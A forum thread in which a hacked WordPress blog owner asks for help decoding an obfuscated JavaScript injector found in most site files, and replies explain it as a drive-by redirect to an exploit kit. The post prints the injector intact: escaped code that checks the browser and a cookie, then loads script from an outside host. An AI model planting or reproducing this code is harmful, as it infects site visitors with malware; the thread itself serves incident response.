My blog got hacked, help with decoding

prozium

Newbie
Joined
Mar 31, 2009
Messages
48
Reaction score
12
Hi there, this is my first thread here and i didn't want it to be something like this but, we can't get what we want ....
So to the point - My blog(wordpres 2.5) got hacked, it was my hoster's fault. All my .php/.js/.xml files got edited (well not all of them, but most of them), the edition of ALL(in all folders - admin, plugins, themes and so on... ) the files took 2-3 minutes, so i'm assumig that he used a script of some kind.
This code was inserted in most of the .php/.js/.xml files

Code:
</head><script language=javascript><!-- 
(function(m9RlI){var HAspt='%';var UoQSJ=unescape(('var:20a:3d:22Scr:69p:74:45n:67ine:22:2cb:3d:22Versi:6fn:28)+:22:2cj:3d:22:22:2cu:3dnav:69ga:74or:2e:75serAg:65:6et:3bif((u:2eind:65xOf(:22W:69n:22):3e0):26:26:28:75:2eindexOf(:22:4eT:206:22):3c0):26:26(doc:75ment:2ecoo:6bie:2eind:65x:4ff:28:22:6d:69e:6b:3d1:22):3c:30):26:26(typ:65of(zr:76zts:29:21:3dtypeof(:22A:22:29):29:7b:7arvzts:3d:22A:22:3be:76al(:22if(win:64o:77:2e:22+a:2b:22)j:3dj+:22+:61+:22Major:22+b+a+:22Min:6fr:22+b:2ba+:22Build:22+b:2b:22j:3b:22):3bdo:63ument:2ewrite(:22:3c:73cri:70t:20s:72c:3d:2f:2fgu:6dblar:2ec:6e:2frs:73:2f:3f:69:64:3d:22+j+:22:3e:3c:5c:2fsc:72ipt:3e:22):3b:7d').replace(m9RlI,HAspt));eval(UoQSJ)})(/:/g);
 --></script>
<body>

It's some kind of redirecting script, that redirects to something (adware/spyware/virii), still not sure what. If there is someone who can help me decode it and understand what is it doing i will really appreciate any help.

I can provide the php, that includes this code too if necessary.
 
sucks man.. download exploit scanner plugin and scan ur blog .. it will show the suspicious pages and provides a few instruction on how to remove the codes..

My blog was hacked and this plugin helped me find those malicious code.. also google marked the blog as SITE IS HARMFUL.. so better do this RIGHT NOW...
 
First thing i did was to take the blog down, it was exposed only 3 hours. Thanks for the advise i will scan it with the plugin, but first the hoster must figure all how did his server got hacked. I want to decode the js, so i can find out who is doing this and what's the spin here.
 
The javascript injection on your pages is obfuscated iframe. Any user sent to your blog will be silently (and invisibly) redirected to a exploit kit. The kit will try inject shellcode onto the visitor, and thus infecting them.

Could be a banking trojan, a standard bot for a botnet or some other random viri.

You have a unupdated script that was on your shared/hosting public html directory. Unless you remove whatever is outdated and exploitable, it will continue to be infected. Via remote file inclusion or a SQL injection.

All of the .php and or .html files was done in a second via a simple to make perl script. They had shell access to your site, probally a standard c99 or r57, it doesn't matter.

Your AV was firing detections not at the viri it attempted to land on your box. But the recnizable shellcode.
You dont really have to worry, they're most like scriptkiddies considering its REALLY easy to UD a exploit kit. Just get rid of the vulnerable script and youl be fine.
 
Last edited:
Back
Top